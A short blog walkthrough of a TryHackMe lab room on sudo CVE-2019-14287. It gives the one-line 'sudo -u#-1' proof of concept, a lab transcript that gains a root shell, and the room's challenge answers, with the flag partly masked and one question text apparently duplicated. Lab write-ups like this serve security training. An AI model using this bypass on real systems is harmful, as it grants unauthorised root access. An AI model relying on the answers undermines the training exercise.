SUDO Security Bypass ~ TryHackMe
A tutorial room exploring CVE-2019–14287 in the Unix Sudo Program. Room One in the SudoVulns Series.
TryHackMe room link:
My THM account :)
Hola F0lk5, this THM room is quite very simple and an important vulnerability in UNIX SUDO PROGRAM, worth to note it. Let’s get in.
Task 1: Deploy!
This room can be done by SSHing the given IP with the given creds in Task 2.
Task 2: Security Bypass
The sudo vulnerability CVE-2019–14287 is a security policy bypass issue that provides a user or a program the ability to execute commands as root on a Linux system when the “sudoers configuration” explicitly disallows the root access. Exploiting the vulnerability requires the user to have sudo privileges that allow them to run commands with an arbitrary user ID, except root.
This room was created to making an awareness of this vulnerability, and there is no other interesting challenges.
Vulnerable sudo program version: ‘< 1.8.28’
POC: “sudo -u#-1 <command>”
Example:
tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
Challenges:
#1. What command are you allowed to run with sudo?
Ans: /bin/bash
#2. What command are you allowed to run with sudo?
Ans: THM{l33t_********_bypass}
Tip: Refer question #1 & Example.
This is a simple walkthrough room, more interesting challenges rooms writeups are coming soon! Thanks to content creators of THM!!!
Make a clap to motivate me to try for harder rooms! :)
Follow me on:
